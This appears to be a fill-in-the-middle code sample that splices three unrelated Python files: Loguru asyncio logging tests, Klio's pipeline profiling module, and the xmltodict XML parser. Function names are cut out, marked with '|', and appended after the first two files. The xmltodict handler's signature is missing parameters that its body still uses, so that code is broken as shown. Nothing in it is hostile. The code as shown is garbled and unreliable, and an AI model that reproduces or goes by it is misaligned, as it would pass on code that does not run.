assert sorted(out.splitlines()) == sorted("=> %d" % i for i in range(10))
def test_recursive_coroutine(capsys):
async def task(i):
if i == 0:
await logger.complete()
return
logger.info("{}!", i)
await task(i - 1)
logger.add(async_writer, format="{message}")
asyncio.run(task(9))
out, err = capsys.readouterr()
assert err == ""
assert sorted(out.splitlines()) == sorted("%d!" % i for i in range(1, 10))
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_using_another_event_loop(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_using_another_event_loop_set_global_before_add(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_using_another_event_loop_set_global_after_add(capsys):
async def | ():
logger.debug("A message")
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
asyncio.set_event_loop(loop)
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_run_mutiple_different_loops(capsys):
async def worker(i):
logger.debug("Message {}", i)
await logger.complete()
logger.add(async_writer, format="{message}", loop=None)
asyncio.run(worker(1))
asyncio.run(worker(2))
out, err = capsys.readouterr()
assert err == ""
assert out == "Message 1\nMessage 2\n"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_run_multiple_same_loop(capsys):
async def worker(i):
logger.debug("Message {}", i)
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker(1))
loop.run_until_complete(worker(2))
out, err = capsys.readouterr()
assert err == ""
assert out == "Message 1\nMessage 2\n"
def test_run_multiple_same_loop_set_global(capsys):
async def worker(i):
logger.debug("Message {}", i)
await logger.complete()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker(1))
loop.run_until_complete(worker(2))
out, err = capsys.readouterr()
assert err == ""
assert out == "Message 1\nMessage 2\n"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_complete_in_another_run(capsys):
async def worker_1():
logger.debug("A")
async def worker_2():
logger.debug("B")
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker_1())
loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\nB\n"
assert err == ""
def test_complete_in_another_run_set_global(capsys):
async def worker_1():
logger.debug("A")
async def worker_2():
logger.debug("B")
await logger.complete()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker_1())
loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\nB\n"
assert err == ""
def test_tasks_cancelled_on_remove(capsys):
logger.add(async_writer, format="{message}", catch=False)
async def foo():
logger.info("A")
logger.info("B")
logger.info("C")
logger.remove()
await logger.complete()
asyncio.run(foo())
out, err = capsys.readouterr()
assert out == err == ""
def test_remove_without_tasks(capsys):
logger.add(async_writer, format="{message}", catch=False)
logger.remove()
async def foo():
logger.info("!")
await logger.complete()
asyncio.run(foo())
out, err = capsys.readouterr()
assert out == err == ""
def test_complete_without_tasks(capsys):
logger.add(async_writer, catch=False)
async def worker():
await logger.complete()
asyncio.run(worker())
out, err = capsys.readouterr()
assert out == err == ""
def test_complete_stream_noop(capsys):
logger.add(sys.stderr, format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
out, err = capsys.readouterr()
assert out == ""
assert err == "A\nB\nC\nD\n"
def test_complete_file_noop(tmpdir):
filepath = tmpdir.join("test.log")
logger.add(str(filepath), format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
assert filepath.read() == "A\nB\nC\nD\n"
def test_complete_function_noop():
out = ""
def write(msg):
nonlocal out
out += msg
logger.add(write, format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
assert out == "A\nB\nC\nD\n"
def test_complete_standard_noop(capsys):
logger.add(logging.StreamHandler(sys.stderr), format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
out, err = capsys.readouterr()
assert out == ""
assert err == "A\nB\nC\nD\n"
def test_exception_in_coroutine_caught(capsys):
async def sink(msg):
raise Exception("Oh no")
async def main():
logger.add(sink, catch=True)
logger.info("Hello world")
await asyncio.sleep(0.1)
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
lines = err.strip().splitlines()
assert out == ""
assert lines[0] == "--- Logging error in Loguru Handler #0 ---"
assert re.match(r"Record was: \{.*Hello world.*\}", lines[1])
assert lines[-2] == "Exception: Oh no"
assert lines[-1] == "--- End of logging error ---"
def test_exception_in_coroutine_not_caught(capsys, caplog):
async def sink(msg):
raise ValueError("Oh no")
async def main():
logger.add(sink, catch=False)
logger.info("Hello world")
await asyncio.sleep(0.1)
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
assert out == err == ""
records = caplog.records
assert len(records) == 1
record = records[0]
message = record.getMessage()
assert "Logging error in Loguru Handler" not in message
assert "was never retrieved" not in message
exc_type, exc_value, _ = record.exc_info
assert exc_type == ValueError
assert str(exc_value) == "Oh no"
def test_exception_in_coroutine_during_complete_caught(capsys):
async def sink(msg):
await asyncio.sleep(0.1)
raise Exception("Oh no")
async def main():
logger.add(sink, catch=True)
logger.info("Hello world")
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
lines = err.strip().splitlines()
assert out == ""
assert lines[0] == "--- Logging error in Loguru Handler #0 ---"
assert re.match(r"Record was: \{.*Hello world.*\}", lines[1])
assert lines[-2] == "Exception: Oh no"
assert lines[-1] == "--- End of logging error ---"
def test_exception_in_coroutine_during_complete_not_caught(capsys, caplog):
async def sink(msg):
await asyncio.sleep(0.1)
raise ValueError("Oh no")
async def main():
logger.add(sink, catch=False)
logger.info("Hello world")
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
assert out == err == ""
records = caplog.records
assert len(records) == 1
record = records[0]
message = record.getMessage()
assert "Logging error in Loguru Handler" not in message
assert "was never retrieved" not in message
exc_type, exc_value, _ = record.exc_info
assert exc_type == ValueError
assert str(exc_value) == "Oh no"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_enqueue_coroutine_loop_not_none(capsys):
loop = asyncio.new_event_loop()
logger.add(async_writer, enqueue=True, loop=loop, format="{message}", catch=False)
async def worker():
logger.info("A")
await logger.complete()
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_enqueue_coroutine_loop_not_none_set_global(capsys):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, enqueue=True, loop=loop, format="{message}", catch=False)
async def worker():
logger.info("A")
await logger.complete()
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_enqueue_coroutine_loop_is_none(capsys):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, enqueue=True, loop=None, format="{message}", catch=False)
async def worker(msg):
logger.info(msg)
await logger.complete()
asyncio.run(worker("A"))
out, err = capsys.readouterr()
assert out == err == ""
loop.run_until_complete(worker("B"))
out, err = capsys.readouterr()
assert out == "A\nB\n"
assert err == ""
def test_enqueue_coroutine_loop_is_none_set_global(capsys):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, enqueue=True, loop=None, format="{message}", catch=False)
async def worker(msg):
logger.info(msg)
await logger.complete()
loop.run_until_complete(worker("A"))
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_custom_complete_function(capsys):
awaited = False
class Handler:
def write(self, message):
print(message, end="")
async def complete(self):
nonlocal awaited
awaited = True
async def worker():
logger.info("A")
await logger.complete()
logger.add(Handler(), catch=False, format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
assert awaited
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_complete_from_another_loop(capsys, loop_is_none):
main_loop = asyncio.new_event_loop()
second_loop = asyncio.new_event_loop()
loop = None if loop_is_none else main_loop
logger.add(async_writer, loop=loop, format="{message}")
async def worker_1():
logger.info("A")
async def worker_2():
await logger.complete()
main_loop.run_until_complete(worker_1())
second_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == err == ""
main_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_complete_from_another_loop_set_global(capsys, loop_is_none):
main_loop = asyncio.new_event_loop()
second_loop = asyncio.new_event_loop()
loop = None if loop_is_none else main_loop
logger.add(async_writer, loop=loop, format="{message}")
async def worker_1():
logger.info("A")
async def worker_2():
await logger.complete()
asyncio.set_event_loop(main_loop)
main_loop.run_until_complete(worker_1())
asyncio.set_event_loop(second_loop)
second_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == err == ""
asyncio.set_event_loop(main_loop)
main_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_complete_from_multiple_threads_loop_is_none(capsys):
async def worker(i):
for j in range(100):
await asyncio.sleep(0)
logger.info("{:03}", i)
await logger.complete()
async def sink(msg):
print(msg, end="")
def worker_(i):
asyncio.run(worker(i))
logger.add(sink, catch=False, format="{message}")
threads = [threading.Thread(target=worker_, args=(i,)) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
out, err = capsys.readouterr()
assert sorted(out.splitlines()) == ["{:03}".format(i) for i in range(10) for _ in range(100)]
assert err == ""
def test_complete_from_multiple_threads_loop_is_not_none(capsys):
async def worker(i):
for j in range(100):
await asyncio.sleep(0)
logger.info("{:03}", i)
await logger.complete()
async def sink(msg):
print(msg, end="")
def worker_(i):
asyncio.run(worker(i))
loop = asyncio.new_event_loop()
logger.add(sink, catch=False, format="{message}", loop=loop)
threads = [threading.Thread(target=worker_, args=(i,)) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
async def complete():
await logger.complete()
loop.run_until_complete(complete())
out, err = capsys.readouterr()
assert sorted(out.splitlines()) == ["{:03}".format(i) for i in range(10) for _ in range(100)]
assert err == ""
async def async_subworker(logger_):
logger_.info("Child")
await logger_.complete()
async def async_mainworker(logger_):
logger_.info("Main")
await logger_.complete()
def subworker(logger_):
loop = asyncio.get_event_loop()
loop.run_until_complete(async_subworker(logger_))
class Writer:
def __init__(self):
self.output = ""
async def write(self, message):
self.output += message
def test_complete_with_sub_processes(monkeypatch, capsys):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
loop = asyncio.new_event_loop()
writer = Writer()
logger.add(writer.write, format="{message}", enqueue=True, loop=loop)
process = ctx.Process(target=subworker, args=[logger])
process.start()
process.join()
async def complete():
await logger.complete()
loop.run_until_complete(complete())
out, err = capsys.readouterr()
assert out == err == ""
assert writer.output == "Child\n"
| worker |
profile.py | # Copyright 2020 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import collections
import contextlib
import functools
import logging
import os
import subprocess
import sys
import tempfile
import time
import apache_beam as beam
try:
import memory_profiler
except ImportError: # pragma: no cover
logging.error(
"Failed to import profiling dependencies. Did you install "
"`klio-exec[debug]` in your job's Docker image?"
)
raise SystemExit(1)
from klio.transforms import decorators
from klio_core.proto import klio_pb2
from klio_exec.commands.utils import cpu_utils
from klio_exec.commands.utils import memory_utils
from klio_exec.commands.utils import profile_utils
@contextlib.contextmanager
def smart_open(filename=None, fmode=None):
"""Handle both stdout and files in the same manner."""
if filename and filename != "-":
fh = open(filename, fmode)
else:
fh = sys.stdout
try:
yield fh
finally:
if fh is not sys.stdout:
fh.close()
class StubIOSubMapper(object):
def __init__(self, input_pcol):
def fake_constructor(*args, **kwargs):
return input_pcol
# normally this is a map of io-name -> transform class. Instead we'll
# just have every possible name return our pretend constructor that
# returns our pre-constructed transform
self.input = collections.defaultdict(lambda: fake_constructor)
self.output = {} # no outputs
class StubIOMapper(object):
def __init__(self, input_pcol, iterations):
repeated_input = input_pcol | beam.FlatMap(lambda x: [x] * iterations)
self.batch = StubIOSubMapper(repeated_input)
self.streaming = StubIOSubMapper(repeated_input)
@staticmethod
def from_input_file(file_path, iterations):
transform = beam.io.ReadFromText(file_path)
return StubIOMapper(transform, iterations)
@staticmethod
def from_entity_ids(id_list, iterations):
transform = beam.Create(id_list)
return StubIOMapper(transform, iterations)
class KlioPipeline(object):
DEFAULT_FILE_PREFIX = "klio_profile_{what}_{ts}"
TRANSFORMS_PATH = "./transforms.py"
def __init__(
self, klio_config, input_file=None, output_file=None, entity_ids=None
):
self.input_file = input_file
self.output_file = output_file
self.entity_ids = entity_ids
self._stream = None
self._now_str = time.strftime("%Y%m%d%H%M%S", time.localtime())
self.klio_config = klio_config
def _get_output_png_file(self, what, temp_output):
output_file_base = self.output_file
prefix = KlioPipeline.DEFAULT_FILE_PREFIX.format(
what=what, ts=self._now_str
)
if temp_output:
output_file_base = prefix
elif "." in self.output_file:
# reuse a user's output file name, just replace existing extension
output_file_base = os.path.splitext(self.output_file)[0]
return "{}.png".format(output_file_base)
@contextlib.contextmanager
def _smart_temp_create(self, what, plot_graph):
# For plotting a graph, an output file of the data collected is
# needed, but the user shouldn't be required to provide an output
# file if they don't want. This creates a tempfile to write data
# to for generating the plot graph off of.
# A context manager needed so that temp file can be cleaned up after.
temp_output = False
prefix = KlioPipeline.DEFAULT_FILE_PREFIX.format(
what=what, ts=self._now_str
)
if plot_graph and not self.output_file:
temp_output_file = tempfile.NamedTemporaryFile(
dir=".", prefix=prefix
)
self.output_file = temp_output_file.name
temp_output = True
yield temp_output
def _get_subproc(self, **kwargs):
cmd = ["klioexec", "profile", "run-pipeline"]
if kwargs.get("show_logs"):
cmd.append("--show-logs")
if self.input_file:
cmd.extend(["--input-file", self.input_file])
else:
cmd.extend(self.entity_ids)
return subprocess.Popen(cmd)
def _get_cpu_line_profiler(self):
return cpu_utils.KLineProfiler()
def _profile_wall_time_per_line(self, iterations, **_):
profiler = self._get_cpu_line_profiler()
decorators.ACTIVE_PROFILER = profiler
self._run_pipeline(iterations=iterations)
if self.output_file:
return profiler.print_stats(self.output_file, output_unit=1)
# output_unit = 1 second, meaning the numbers in "Time" and
# "Per Hit" columns are in seconds
profiler.print_stats(output_unit=1)
def _get_memory_line_profiler(self):
return memory_utils.KMemoryLineProfiler(backend="psutil")
def | (self, profiler, get_maximum):
wrapper = memory_utils.KMemoryLineProfiler.wrap_per_element
if get_maximum:
wrapper = functools.partial(
memory_utils.KMemoryLineProfiler.wrap_maximum, profiler
)
return wrapper
def _profile_memory_per_line(self, get_maximum=False):
profiler = self._get_memory_line_profiler()
decorators.ACTIVE_PROFILER = self._get_memory_line_wrapper(
profiler, get_maximum
)
# "a"ppend if output per element; "w"rite (once) for maximum.
# append will append a file with potentially already-existing data
# (i.e. from a previous run), which may be confusing; but with how
# memory_profiler treats streams, there's no simple way to prevent
# appending data for per-element without re-implementing parts of
# memory_profiler (maybe someday?) @lynn
fmode = "w" if get_maximum else "a"
with smart_open(self.output_file, fmode=fmode) as f:
self._stream = f
self._run_pipeline()
if get_maximum:
memory_profiler.show_results(profiler, stream=self._stream)
def _profile_memory(self, **kwargs):
# Profile the memory while the pipeline runs in another process
p = self._get_subproc(**kwargs)
plot_graph = kwargs.get("plot_graph")
with self._smart_temp_create("memory", plot_graph) as temp_output:
with smart_open(self.output_file, fmode="w") as f:
memory_profiler.memory_usage(
proc=p,
interval=kwargs.get("interval"),
timestamps=True,
include_children=kwargs.get("include_children"),
multiprocess=kwargs.get("multiprocess"),
stream=f,
)
if not plot_graph:
return
output_png = self._get_output_png_file("memory", temp_output)
profile_utils.plot(
input_file=self.output_file,
output_file=output_png,
x_label="Time (in seconds)",
y_label="Memory used (in MiB)",
title="Memory Used While Running Klio-based Transforms",
)
return output_png
def _profile_cpu(self, **kwargs):
# Profile the CPU while the pipeline runs in another process
p = self._get_subproc(**kwargs)
plot_graph = kwargs.get("plot_graph")
with self._smart_temp_create("cpu", plot_graph) as temp_output:
with smart_open(self.output_file, fmode="w") as f:
cpu_utils.get_cpu_usage(
proc=p, interval=kwargs.get("interval"), stream=f,
)
if not plot_graph:
return
output_png = self._get_output_png_file("cpu", temp_output)
profile_utils.plot(
input_file=self.output_file,
output_file=output_png,
x_label="Time (in seconds)",
y_label="CPU%",
title="CPU Usage of All Klio-based Transforms",
)
return output_png
def _get_user_pipeline(self, config, io_mapper):
runtime_config = collections.namedtuple(
"RuntimeConfig",
["image_tag", "direct_runner", "update", "blocking"],
)(None, True, False, True)
from klio_exec.commands.run import KlioPipeline as KP
return KP("profile_job", config, runtime_config, io_mapper)
def _get_user_config(self):
self.klio_config.pipeline_options.runner = "direct"
self.klio_config.job_config.events.outputs = {}
return self.klio_config
@staticmethod
def _entity_id_to_message(entity_id):
message = klio_pb2.KlioMessage()
message.data.element = bytes(entity_id, "UTF-8")
message.metadata.intended_recipients.anyone.SetInParent()
message.version = klio_pb2.Version.V2
return message
def _get_io_mapper(self, iterations):
if self.input_file:
return StubIOMapper.from_input_file(self.input_file, iterations)
else:
messages = []
for entity_id in self.entity_ids:
message = self._entity_id_to_message(entity_id)
messages.append(message.SerializeToString())
return StubIOMapper.from_entity_ids(messages, iterations)
def _run_pipeline(self, iterations=None, **_):
if not iterations:
iterations = 1
io_mapper = self._get_io_mapper(iterations)
config = self._get_user_config()
pipeline = self._get_user_pipeline(config, io_mapper)
pipeline.run()
def profile(self, what, **kwargs):
if what == "run":
return self._run_pipeline(**kwargs)
elif what == "cpu":
return self._profile_cpu(**kwargs)
elif what == "memory":
return self._profile_memory(**kwargs)
elif what == "memory_per_line":
return self._profile_memory_per_line(**kwargs)
elif what == "timeit":
return self._profile_wall_time_per_line(**kwargs)
| _get_memory_line_wrapper |
xmltodict.py | #!/usr/bin/env python
"Makes working with XML feel like you are working with JSON"
## https://github.com/martinblech/xmltodict
try:
from defusedexpat import pyexpat as expat
except ImportError:
from xml.parsers import expat
from xml.sax.saxutils import XMLGenerator
from xml.sax.xmlreader import AttributesImpl
try: # pragma no cover
from cStringIO import StringIO
except ImportError: # pragma no cover
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
try: # pragma no cover
from collections import OrderedDict
except ImportError: # pragma no cover
try:
from ordereddict import OrderedDict
except ImportError:
OrderedDict = dict
try: # pragma no cover
_basestring = basestring
except NameError: # pragma no cover
_basestring = str
try: # pragma no cover
_unicode = unicode
except NameError: # pragma no cover
_unicode = str
__author__ = 'Martin Blech'
__version__ = '0.11.0'
__license__ = 'MIT'
class ParsingInterrupted(Exception):
pass
class _DictSAXHandler(object):
def __init__(self,
item_depth=0,
item_callback=lambda *args: True,
xml_attribs=True,
attr_prefix='@',
cdata_key='#text',
force_cdata=False,
cdata_separator='',
postprocessor=None, | force_list=None):
self.path = []
self.stack = []
self.data = []
self.item = None
self.item_depth = item_depth
self.xml_attribs = xml_attribs
self.item_callback = item_callback
self.attr_prefix = attr_prefix
self.cdata_key = cdata_key
self.force_cdata = force_cdata
self.cdata_separator = cdata_separator
self.postprocessor = postprocessor
self.dict_constructor = dict_constructor
self.strip_whitespace = strip_whitespace
self.namespace_separator = namespace_separator
self.namespaces = namespaces
self.namespace_declarations = OrderedDict()
self.force_list = force_list
def _build_name(self, full_name):
if not self.namespaces:
return full_name
i = full_name.rfind(self.namespace_separator)
if i == -1:
return full_name
namespace, name = full_name[:i], full_name[i+1:]
short_namespace = self.namespaces.get(namespace, namespace)
if not short_namespace:
return name
else:
return self.namespace_separator.join((short_namespace, name))
def _attrs_to_dict(self, attrs):
if isinstance(attrs, dict):
return attrs
return self.dict_constructor(zip(attrs[0::2], attrs[1::2]))
def startNamespaceDecl(self, prefix, uri):
self.namespace_declarations[prefix or ''] = uri
def startElement(self, full_name, attrs):
name = self._build_name(full_name)
attrs = self._attrs_to_dict(attrs)
if attrs and self.namespace_declarations:
attrs['xmlns'] = self.namespace_declarations
self.namespace_declarations = OrderedDict()
self.path.append((name, attrs or None))
if len(self.path) > self.item_depth:
self.stack.append((self.item, self.data))
if self.xml_attribs:
attr_entries = []
for key, value in attrs.items():
key = self.attr_prefix+self._build_name(key)
if self.postprocessor:
entry = self.postprocessor(self.path, key, value)
else:
entry = (key, value)
if entry:
attr_entries.append(entry)
attrs = self.dict_constructor(attr_entries)
else:
attrs = None
self.item = attrs or None
self.data = []
def endElement(self, full_name):
name = self._build_name(full_name)
if len(self.path) == self.item_depth:
item = self.item
if item is None:
item = (None if not self.data
else self.cdata_separator.join(self.data))
should_continue = self.item_callback(self.path, item)
if not should_continue:
raise ParsingInterrupted()
if len(self.stack):
data = (None if not self.data
else self.cdata_separator.join(self.data))
item = self.item
self.item, self.data = self.stack.pop()
if self.strip_whitespace and data:
data = data.strip() or None
if data and self.force_cdata and item is None:
item = self.dict_constructor()
if item is not None:
if data:
self.push_data(item, self.cdata_key, data)
self.item = self.push_data(self.item, name, item)
else:
self.item = self.push_data(self.item, name, data)
else:
self.item = None
self.data = []
self.path.pop()
def characters(self, data):
if not self.data:
self.data = [data]
else:
self.data.append(data)
def push_data(self, item, key, data):
if self.postprocessor is not None:
result = self.postprocessor(self.path, key, data)
if result is None:
return item
key, data = result
if item is None:
item = self.dict_constructor()
try:
value = item[key]
if isinstance(value, list):
value.append(data)
else:
item[key] = [value, data]
except KeyError:
if self._should_force_list(key, data):
item[key] = [data]
else:
item[key] = data
return item
def _should_force_list(self, key, value):
if not self.force_list:
return False
try:
return key in self.force_list
except TypeError:
return self.force_list(self.path[:-1], key, value)
def parse(xml_input, encoding=None, expat=expat, process_namespaces=False,
namespace_separator=':', disable_entities=True, **kwargs):
"""Parse the given XML input and convert it into a dictionary.
`xml_input` can either be a `string` or a file-like object.
If `xml_attribs` is `True`, element attributes are put in the dictionary
among regular child elements, using `@` as a prefix to avoid collisions. If
set to `False`, they are just ignored.
Simple example::
>>> import xmltodict
>>> doc = xmltodict.parse(\"\"\"
... <a prop="x">
... <b>1</b>
... <b>2</b>
... </a>
... \"\"\")
>>> doc['a']['@prop']
u'x'
>>> doc['a']['b']
[u'1', u'2']
If `item_depth` is `0`, the function returns a dictionary for the root
element (default behavior). Otherwise, it calls `item_callback` every time
an item at the specified depth is found and returns `None` in the end
(streaming mode).
The callback function receives two parameters: the `path` from the document
root to the item (name-attribs pairs), and the `item` (dict). If the
callback's return value is false-ish, parsing will be stopped with the
:class:`ParsingInterrupted` exception.
Streaming example::
>>> def handle(path, item):
... print('path:%s item:%s' % (path, item))
... return True
...
>>> xmltodict.parse(\"\"\"
... <a prop="x">
... <b>1</b>
... <b>2</b>
... </a>\"\"\", item_depth=2, item_callback=handle)
path:[(u'a', {u'prop': u'x'}), (u'b', None)] item:1
path:[(u'a', {u'prop': u'x'}), (u'b', None)] item:2
The optional argument `postprocessor` is a function that takes `path`,
`key` and `value` as positional arguments and returns a new `(key, value)`
pair where both `key` and `value` may have changed. Usage example::
>>> def postprocessor(path, key, value):
... try:
... return key + ':int', int(value)
... except (ValueError, TypeError):
... return key, value
>>> xmltodict.parse('<a><b>1</b><b>2</b><b>x</b></a>',
... postprocessor=postprocessor)
OrderedDict([(u'a', OrderedDict([(u'b:int', [1, 2]), (u'b', u'x')]))])
You can pass an alternate version of `expat` (such as `defusedexpat`) by
using the `expat` parameter. E.g:
>>> import defusedexpat
>>> xmltodict.parse('<a>hello</a>', expat=defusedexpat.pyexpat)
OrderedDict([(u'a', u'hello')])
You can use the force_list argument to force lists to be created even
when there is only a single child of a given level of hierarchy. The
force_list argument is a tuple of keys. If the key for a given level
of hierarchy is in the force_list argument, that level of hierarchy
will have a list as a child (even if there is only one sub-element).
The index_keys operation takes precendence over this. This is applied
after any user-supplied postprocessor has already run.
For example, given this input:
<servers>
<server>
<name>host1</name>
<os>Linux</os>
<interfaces>
<interface>
<name>em0</name>
<ip_address>10.0.0.1</ip_address>
</interface>
</interfaces>
</server>
</servers>
If called with force_list=('interface',), it will produce
this dictionary:
{'servers':
{'server':
{'name': 'host1',
'os': 'Linux'},
'interfaces':
{'interface':
[ {'name': 'em0', 'ip_address': '10.0.0.1' } ] } } }
`force_list` can also be a callable that receives `path`, `key` and
`value`. This is helpful in cases where the logic that decides whether
a list should be forced is more complex.
"""
handler = _DictSAXHandler(namespace_separator=namespace_separator,
**kwargs)
if isinstance(xml_input, _unicode):
if not encoding:
encoding = 'utf-8'
xml_input = xml_input.encode(encoding)
if not process_namespaces:
namespace_separator = None
parser = expat.ParserCreate(
encoding,
namespace_separator
)
try:
parser.ordered_attributes = True
except AttributeError:
# Jython's expat does not support ordered_attributes
pass
parser.StartNamespaceDeclHandler = handler.startNamespaceDecl
parser.StartElementHandler = handler.startElement
parser.EndElementHandler = handler.endElement
parser.CharacterDataHandler = handler.characters
parser.buffer_text = True
if disable_entities:
try:
# Attempt to disable DTD in Jython's expat parser (Xerces-J).
feature = "http://apache.org/xml/features/disallow-doctype-decl"
parser._reader.setFeature(feature, True)
except AttributeError:
# For CPython / expat parser.
# Anything not handled ends up here and entities aren't expanded.
parser.DefaultHandler = lambda x: None
# Expects an integer return; zero means failure -> expat.ExpatError.
parser.ExternalEntityRefHandler = lambda *x: 1
if hasattr(xml_input, 'read'):
parser.ParseFile(xml_input)
else:
parser.Parse(xml_input, True)
return handler.item
def _process_namespace(name, namespaces, ns_sep=':', attr_prefix='@'):
if not namespaces:
return name
try:
ns, name = name.rsplit(ns_sep, 1)
except ValueError:
pass
else:
ns_res = namespaces.get(ns.strip(attr_prefix))
name = '{0}{1}{2}{3}'.format(
attr_prefix if ns.startswith(attr_prefix) else '',
ns_res, ns_sep, name) if ns_res else name
return name
def _emit(key, value, content_handler,
attr_prefix='@',
cdata_key='#text',
depth=0,
preprocessor=None,
pretty=False,
newl='\n',
indent='\t',
namespace_separator=':',
namespaces=None,
full_document=True):
key = _process_namespace(key, namespaces, namespace_separator, attr_prefix)
if preprocessor is not None:
result = preprocessor(key, value)
if result is None:
return
key, value = result
if (not hasattr(value, '__iter__')
or isinstance(value, _basestring)
or isinstance(value, dict)):
value = [value]
for index, v in enumerate(value):
if full_document and depth == 0 and index > 0:
raise ValueError('document with multiple roots')
if v is None:
v = OrderedDict()
elif isinstance(v, bool):
if v:
v = _unicode('true')
else:
v = _unicode('false')
elif not isinstance(v, dict):
v = _unicode(v)
if isinstance(v, _basestring):
v = OrderedDict(((cdata_key, v),))
cdata = None
attrs = OrderedDict()
children = []
for ik, iv in v.items():
if ik == cdata_key:
cdata = iv
continue
if ik.startswith(attr_prefix):
ik = _process_namespace(ik, namespaces, namespace_separator,
attr_prefix)
if ik == '@xmlns' and isinstance(iv, dict):
for k, v in iv.items():
attr = 'xmlns{0}'.format(':{0}'.format(k) if k else '')
attrs[attr] = _unicode(v)
continue
if not isinstance(iv, _unicode):
iv = _unicode(iv)
attrs[ik[len(attr_prefix):]] = iv
continue
children.append((ik, iv))
if pretty:
content_handler.ignorableWhitespace(depth * indent)
content_handler.startElement(key, AttributesImpl(attrs))
if pretty and children:
content_handler.ignorableWhitespace(newl)
for child_key, child_value in children:
_emit(child_key, child_value, content_handler,
attr_prefix, cdata_key, depth+1, preprocessor,
pretty, newl, indent, namespaces=namespaces,
namespace_separator=namespace_separator)
if cdata is not None:
content_handler.characters(cdata)
if pretty and children:
content_handler.ignorableWhitespace(depth * indent)
content_handler.endElement(key)
if pretty and depth:
content_handler.ignorableWhitespace(newl)
def unparse(input_dict, output=None, encoding='utf-8', full_document=True,
short_empty_elements=False,
**kwargs):
"""Emit an XML document for the given `input_dict` (reverse of `parse`).
The resulting XML document is returned as a string, but if `output` (a
file-like object) is specified, it is written there instead.
Dictionary keys prefixed with `attr_prefix` (default=`'@'`) are interpreted
as XML node attributes, whereas keys equal to `cdata_key`
(default=`'#text'`) are treated as character data.
The `pretty` parameter (default=`False`) enables pretty-printing. In this
mode, lines are terminated with `'\n'` and indented with `'\t'`, but this
can be customized with the `newl` and `indent` parameters.
"""
if full_document and len(input_dict) != 1:
raise ValueError('Document must have exactly one root.')
must_return = False
if output is None:
output = StringIO()
must_return = True
if short_empty_elements:
content_handler = XMLGenerator(output, encoding, True)
else:
content_handler = XMLGenerator(output, encoding)
if full_document:
content_handler.startDocument()
for key, value in input_dict.items():
_emit(key, value, content_handler, full_document=full_document,
**kwargs)
if full_document:
content_handler.endDocument()
if must_return:
value = output.getvalue()
try: # pragma no cover
value = value.decode(encoding)
except AttributeError: # pragma no cover
pass
return value
